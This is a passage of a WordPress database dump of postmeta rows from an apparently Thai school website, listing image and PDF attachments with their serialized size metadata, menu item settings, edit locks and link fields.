(3526, 988, '_wp_attached_file', '2018/02/6-2-2561-11-09-15.jpg'),
(3527, 988, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:546;s:6:\"height\";i:132;s:4:\"file\";s:29:\"2018/02/6-2-2561-11-09-15.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"6-2-2561-11-09-15-150x132.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:132;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"6-2-2561-11-09-15-300x73.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:73;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"6-2-2561-11-09-15-400x97.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:97;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3528, 989, '_wp_attached_file', '2018/02/6-2-2561-11-12-19.jpg'),
(3529, 989, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:728;s:6:\"height\";i:160;s:4:\"file\";s:29:\"2018/02/6-2-2561-11-12-19.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"6-2-2561-11-12-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"6-2-2561-11-12-19-300x66.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:66;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"6-2-2561-11-12-19-400x88.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3530, 990, '_wp_attached_file', '2018/02/6-2-2561-11-15-12.jpg'),
(3531, 990, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:726;s:6:\"height\";i:160;s:4:\"file\";s:29:\"2018/02/6-2-2561-11-15-12.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"6-2-2561-11-15-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"6-2-2561-11-15-12-300x66.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:66;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"6-2-2561-11-15-12-400x88.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3532, 991, '_wp_attached_file', '2018/02/6-2-2561-11-17-16.jpg'),
(3533, 991, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:793;s:6:\"height\";i:161;s:4:\"file\";s:29:\"2018/02/6-2-2561-11-17-16.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"6-2-2561-11-17-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"6-2-2561-11-17-16-300x61.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:61;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"6-2-2561-11-17-16-768x156.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"6-2-2561-11-17-16-400x81.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3534, 982, '_publicize_pending', '1'),
(3545, 1000, '_edit_lock', '1529302041:4'),
(3546, 1000, '_edit_last', '4'),
(3547, 1000, '_publicize_pending', '1'),
(3548, 1000, '_hide_featured', NULL),
(3552, 1005, '_menu_item_type', 'custom'),
(3553, 1005, '_menu_item_menu_item_parent', '0'),
(3554, 1005, '_menu_item_object_id', '1005'),
(3555, 1005, '_menu_item_object', 'custom'),
(3556, 1005, '_menu_item_target', '_blank'),
(3557, 1005, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3558, 1005, '_menu_item_xfn', ''),
(3559, 1005, '_menu_item_url', '/wp-admin'),
(3561, 1005, '_publicize_pending', '1'),
(3565, 1007, '_wp_attached_file', '2018/01/201802061754_Page_01.png'),
(3566, 1007, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1569;s:6:\"height\";i:2336;s:4:\"file\";s:32:\"2018/01/201802061754_Page_01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_01-201x300.png\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_01-768x1143.png\";s:5:\"width\";i:768;s:6:\"height\";i:1143;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_01-688x1024.png\";s:5:\"width\";i:688;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_01-201x300.png\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3567, 1008, '_wp_attached_file', '2018/01/201802061754_Page_02.png'),
(3568, 1008, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1580;s:6:\"height\";i:2332;s:4:\"file\";s:32:\"2018/01/201802061754_Page_02.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_02-203x300.png\";s:5:\"width\";i:203;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_02-768x1134.png\";s:5:\"width\";i:768;s:6:\"height\";i:1134;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_02-694x1024.png\";s:5:\"width\";i:694;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_02-203x300.png\";s:5:\"width\";i:203;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3569, 1009, '_wp_attached_file', '2018/01/201802061754_Page_03.png'),
(3570, 1009, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1569;s:6:\"height\";i:2328;s:4:\"file\";s:32:\"2018/01/201802061754_Page_03.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_03-202x300.png\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_03-768x1140.png\";s:5:\"width\";i:768;s:6:\"height\";i:1140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_03-690x1024.png\";s:5:\"width\";i:690;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_03-202x300.png\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3571, 1010, '_wp_attached_file', '2018/01/201802061754_Page_04.png'),
(3572, 1010, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1573;s:6:\"height\";i:2336;s:4:\"file\";s:32:\"2018/01/201802061754_Page_04.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_04-202x300.png\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_04-768x1141.png\";s:5:\"width\";i:768;s:6:\"height\";i:1141;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_04-690x1024.png\";s:5:\"width\";i:690;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_04-202x300.png\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3573, 1011, '_wp_attached_file', '2018/01/201802061754_Page_05.png'),
(3574, 1011, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1561;s:6:\"height\";i:2332;s:4:\"file\";s:32:\"2018/01/201802061754_Page_05.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_05-201x300.png\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_05-768x1147.png\";s:5:\"width\";i:768;s:6:\"height\";i:1147;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_05-685x1024.png\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_05-201x300.png\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3575, 1012, '_wp_attached_file', '2018/01/201802061754_Page_06.png'),
(3576, 1012, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1676;s:6:\"height\";i:2336;s:4:\"file\";s:32:\"2018/01/201802061754_Page_06.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_06-215x300.png\";s:5:\"width\";i:215;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_06-768x1070.png\";s:5:\"width\";i:768;s:6:\"height\";i:1070;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_06-735x1024.png\";s:5:\"width\";i:735;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_06-215x300.png\";s:5:\"width\";i:215;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3577, 1013, '_wp_attached_file', '2018/01/201802061754_Page_07.png'),
(3578, 1013, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1564;s:6:\"height\";i:2332;s:4:\"file\";s:32:\"2018/01/201802061754_Page_07.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_07-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_07-201x300.png\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_07-768x1145.png\";s:5:\"width\";i:768;s:6:\"height\";i:1145;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_07-687x1024.png\";s:5:\"width\";i:687;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_07-201x300.png\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3579, 1014, '_wp_attached_file', '2018/01/201802061754_Page_08.png'),
(3580, 1014, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1576;s:6:\"height\";i:2339;s:4:\"file\";s:32:\"2018/01/201802061754_Page_08.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_08-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_08-202x300.png\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_08-768x1140.png\";s:5:\"width\";i:768;s:6:\"height\";i:1140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_08-690x1024.png\";s:5:\"width\";i:690;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_08-202x300.png\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3581, 1015, '_wp_attached_file', '2018/01/201802061754_Page_09.png'),
(3582, 1015, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1564;s:6:\"height\";i:2328;s:4:\"file\";s:32:\"2018/01/201802061754_Page_09.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_09-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_09-202x300.png\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_09-768x1143.png\";s:5:\"width\";i:768;s:6:\"height\";i:1143;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_09-688x1024.png\";s:5:\"width\";i:688;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_09-202x300.png\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3583, 1016, '_wp_attached_file', '2018/01/201802061754_Page_10.png'),
(3584, 1016, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1592;s:6:\"height\";i:2328;s:4:\"file\";s:32:\"2018/01/201802061754_Page_10.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_10-205x300.png\";s:5:\"width\";i:205;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_10-768x1123.png\";s:5:\"width\";i:768;s:6:\"height\";i:1123;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_10-700x1024.png\";s:5:\"width\";i:700;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_10-205x300.png\";s:5:\"width\";i:205;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3585, 1017, '_wp_attached_file', '2018/01/201802061754_Page_11.png'),
(3586, 1017, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1550;s:6:\"height\";i:2332;s:4:\"file\";s:32:\"2018/01/201802061754_Page_11.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_11-199x300.png\";s:5:\"width\";i:199;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_11-768x1155.png\";s:5:\"width\";i:768;s:6:\"height\";i:1155;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"201802061754_Page_11-681x1024.png\";s:5:\"width\";i:681;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"201802061754_Page_11-199x300.png\";s:5:\"width\";i:199;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3600, 1033, '_edit_lock', '1538086347:4'),
(3601, 1033, '_edit_last', '4'),
(3602, 1033, '_publicize_pending', '1'),
(3603, 1033, '_hide_featured', NULL),
(3604, 1000, '_cg_img_link', 'https://wp.me/P9wTWB-gF'),
(3605, 1000, '_cg_link_target', ''),
(3606, 1033, '_cg_img_link', 'https://drive.google.com/open?id=1j65OP0O27_4Yj6xNKq35_CqYp1kx1R5Y'),
(3607, 1033, '_cg_link_target', ''),
(3608, 1040, '_wp_attached_file', '2018/02/1.jpg'),
(3609, 1040, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:326;s:6:\"height\";i:450;s:4:\"file\";s:13:\"2018/02/1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-217x300.jpg\";s:5:\"width\";i:217;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"1-217x300.jpg\";s:5:\"width\";i:217;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3610, 920, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575578330;s:7:\"payload\";a:1:{i:0;a:1:{s:2:\"id\";i:4260;}}}}'),
(3611, 1053, '_wp_attached_file', '2018/01/manual-rms-for-teacher-2-2560.pdf'),
(3612, 1054, '_wp_attached_file', '2018/01/Watch-guard-chedule-02-2561.pdf'),
(3613, 1055, '_wp_attached_file', '2018/01/student-equipmen-e-bidding-2561-01.pdf'),
(3614, 1056, '_wp_attached_file', '2018/01/student-equipmen-e-bidding-2561-02.pdf'),
(3615, 1057, '_wp_attached_file', '2018/01/quota-admission-2561-pvc.pdf'),
(3616, 1058, '_wp_attached_file', '2018/01/quota-admission-2561-pvs.pdf'),
(3617, 1059, '_wp_attached_file', '2018/01/Watch-guard-chedule-01-2561.pdf'),
(3620, 1061, '_wp_attached_file', '2018/01/e-bidding-4-item-2561.jpg'),
